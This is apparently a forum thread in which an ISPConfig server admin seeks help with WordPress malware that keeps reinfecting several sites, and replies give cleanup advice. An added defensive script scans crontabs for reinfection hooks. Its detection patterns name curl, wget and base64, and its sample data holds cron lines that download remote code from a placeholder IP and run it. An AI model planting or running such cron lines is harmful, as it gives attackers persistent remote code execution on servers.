I've been facing an unusual situation for the last 3 months, with which I have reached the limits of WordPress support, so I'm considering looking at the OS, which may have scripts running to maintain this virus. All my WordPress sites on my ISPConfig3 server are automatically getting a plugin installed. This virus is creating users within WordPress, it's creating plugin folders in the database, it's changing admin email addresses and passwords, as well as adding more admins. When I install plugins such as Wordfence, the virus will actually inactivate and delete the plugin. When I change the password to something I know via the DB, whilst logged into WordPress, the virus will re-change the email address and password and log me out of the admin dashboard. After some time, the virus will disable the front page of the website and also damage the database. I looked through many WordPress forums and asked many WordPress users; no one knows about this virus, so I'm thinking it's a script within my OS... any way to help me resolve this? I attach some screenshots.
Have you tried ISPProtect? https://www.ispconfig.org/add-ons/ If you think the UmMA*.php file is the virus file, does it come back after you delete it? Are there strange cron jobs on that host? Code: ls -lh /var/spool/cron/crontabs/ Did WordFence support help in cleaning up the site?
1- I haven't tried ISPProtect, didn't know about it, will look into it now. 2- The file does come back renamed as another file. The contents are the same. 3- I will check cron jobs and report back. 4- It doesn't allow me to access Wordfence. When I install Wordfence and then try to access the plugin to scan, it immediately changes the password to log me out, and deletes Wordfence.
Does ISPProtect have a GUI interface via the ISPConfig3 portal/dashboard? I think the TRIAL is very limited, see below:
ionCube Check succeeded.
Please enter scan key (or TRIAL if you have none, yet): TRIAL
Please enter path to scan: /var/www
Could not run scan with key TRIAL because of error: TRIAL_LIMIT_REACHED
No. The trial has the same functions that the full version has, but you are allowed to use it only once on your server. This means you must have used the tool already. The trial allows you to use it one time.
Which two? What does this show? Code: ls -lh /var/spool/cron/crontabs/ Do this: https://forum.howtoforge.com/threads/please-read-before-posting.58408/ so we know what OS the host is running and other context.
Alright. I can't ever remember using the program, as I only learned about it now... but it's a long-running server; it may have gone through it via another support tech. Anyway, what's the next step forward then? I see we buy 5 scans usable in a year? So it's pay per use?
I've sent you a PM. There are per-use licenses like the 5, 10, or 25 scan licenses, they have no time or server limit. And there is the yearly license, which is valid for one server for one year with unlimited amount of scans on that server.
I AM NOW DESPERATE. Honestly, I have tried everything I can think of. I deleted all the files under /web. I installed fresh WordPress files. I ensured I didn't use any old files. This is a fresh WordPress site and the malware hits it again! The malware does this:
1- changes the WordPress admin user password and email address
2- adds plugins with weird directory names
3- if the Wordfence plugin is installed, IT DELETES the Wordfence plugin!
There's nothing online pointing to this malware. I have bought ISPProtect licences and ran the scan 3 times. It quarantined some of the files and some not. The malware is on many of my WordPress sites; it doesn't seem to have infected the sites without WordPress. I am sooooo down, I just don't know what to do!
Fighting and removing malware is not always easy. Most likely the malware installed cronjobs which it uses to reinfect the websites. Check with: crontab -l -u web1 where web1 is the user of the infected site. If you see a cronjob there, remove it by editing the user crontab with: crontab -e -u web1 And/or contact @Th0m from ISPConfig business support if he is able to assist you.
You can't just replace the WordPress files and assume the site is now clean. Yes, you do want to back up and wipe out what's in /web (don't forget the hidden files); also back up the database. Now change any FTP passwords, change the MySQL login and password for that site's database access, and, as already suggested, check for any cron jobs and remove any that shouldn't be there.

Now go through the entire database. First remove any spurious WordPress accounts. Change all admin account passwords. Check for anything embedded in there, usually added to content in posts or pages, again often base64 encoded. Remove all spurious content.

Re-download the latest WordPress, the theme, and any used plugins, directly from trusted sources. Before you restore the contents of the uploads folder, you'll want to check each and every file in there: many PHP scripts are masquerading as ordinary image files. Ideally use .htaccess files to block the uploading of PHP files to uploads, and the execution of any and all files under uploads.

Now you can begin to assume that the WordPress site is reasonably clean. Yes, it can be a long and tedious process. And this is just to get a site back up and running; none of this bit even involves trying to work out how the buggers got into the server/site in the first place.
And one thing that might help you temporarily is to disable the suexec checkbox in the website; this will make PHP scripts run as the www-data user instead of the web user. This is generally less secure, and WP won't work as a CMS anymore: you won't be able to upload files in WP, and you also won't be able to update WordPress, install plugins or edit files via WordPress. But the attacker will not be able to do that either, so this can give you some time to investigate things after cleaning up WP without getting reinfected. This is just temporary, during the cleanup and malware removal process, but it can be a useful step.
Noted, will try as suggested. I have a strong suspicion that the malware is in the database... any scanner which can scan DBs, or what can I look out for?
You wrote previously that the malware is on other WordPress sites also. So, are they all owned by the user web4? You should check all crontabs, like I suggested in #2 and #7. Did you ever say what OS is on that host?
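The crontab check recommended in the replies above (crontab -l -u webX for each web user, and a look at the cron spool), as an added example that is not code from anyone in this thread: a POSIX shell script that walks every crontab file in one or more spool directories and flags lines that look like reinfection hooks, and lists which users own a crontab at all. The pattern list, the spool paths and the sample crontabs are assumptions. On CentOS 8 the per-user files live under /var/spool/cron/<user>, on Debian/Ubuntu under /var/spool/cron/crontabs/<user>, and system jobs also sit in /etc/cron.d, so pass all of those directories; a hit still needs a human look, since a legitimate backup job can use curl too.

```shell
#!/bin/sh
# Added example, not code from the thread. Walk per-user crontab files and
# flag lines that look like reinfection hooks. The pattern list and the
# sample spool below are assumptions.

# Things a web user's crontab normally has no business containing.
SUSPICIOUS_RE='base64|eval\(|curl |wget |/tmp/|/dev/shm|python -c|perl -e|php -r|\| *(php|sh|bash)'

# Usage: scan_crontab_dirs DIR [DIR...]
# Prints "<file-name>: <crontab line>" for each matching non-comment line.
# The file name is the owning user for spool dirs, the job name for /etc/cron.d.
scan_crontab_dirs() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] || continue
            name=$(basename "$f")
            # drop comments and blank lines, then grep; grep exits 1 when
            # nothing matches, so swallow that to stay safe under set -e
            grep -v '^[[:space:]]*#' "$f" | grep -Ei "$SUSPICIOUS_RE" \
                | sed "s|^|$name: |" || true
        done
    done
    return 0
}

# Usage: list_crontab_owners DIR [DIR...]
# One name per line, so a web user that should have no cron at all stands
# out even when its job matches none of the patterns above.
list_crontab_owners() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] && basename "$f"
        done
    done
    return 0
}

# Constructed sample spool (not real data from the thread): a benign root
# job, a web user pulling and running remote code, and a benign backup job.
demo() {
    spool=$(mktemp -d)
    printf '%s\n' '# system job' '0 3 * * * /usr/bin/certbot renew --quiet' > "$spool/root"
    printf '%s\n' '*/5 * * * * curl -s http://203.0.113.10/x.txt | php' \
                  '@reboot wget -qO /tmp/.u http://203.0.113.10/u.sh; sh /tmp/.u' > "$spool/web4"
    printf '%s\n' '30 2 * * * /var/www/clients/client1/web6/private/backup.sh' > "$spool/web6"
    echo "crontab owners:"; list_crontab_owners "$spool"
    echo "suspicious lines:"; scan_crontab_dirs "$spool"
    rm -rf "$spool"
}

# Run "sh cron_check.sh demo" for the sample, or call the functions on the
# real directories: scan_crontab_dirs /var/spool/cron /etc/cron.d
[ "${1:-}" = "demo" ] && demo
```

Anything this flags under a webX user should be removed with crontab -e -u webX as described above, and the crontab file's timestamp (ls -l on the spool) tells you when the attacker last had the ability to write it, which narrows the window for checking the web server logs.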
The fact that multiple wp sites are affected can help to narrow down the way the sites got infected (in case they are not owned by the same client of course) by looking at which similarities the sites have in installed plugins and themes.
Yes, the malware is on other WordPress sites as well. No, they are not all owned by web4 but owned by their own webX. Herewith the active crontabs; I disabled some to test. Of the active ones, I don't know what 0anacron and raid-check are, but when I googled them, it didn't show anything malware/virus related, so I enabled them again. I enabled the ISPConfig ones, and I don't know what's running run-getmail.sh, but I'm assuming it's the system cron...
[root@server1 web]# cat /etc/centos-release
CentOS Linux release 8.5.2111
web4, web6, web16, web1: the above have the malware. I have another 4 or 5 sites which either do not use WordPress, or are not as active so no plugins were installed; they are clean.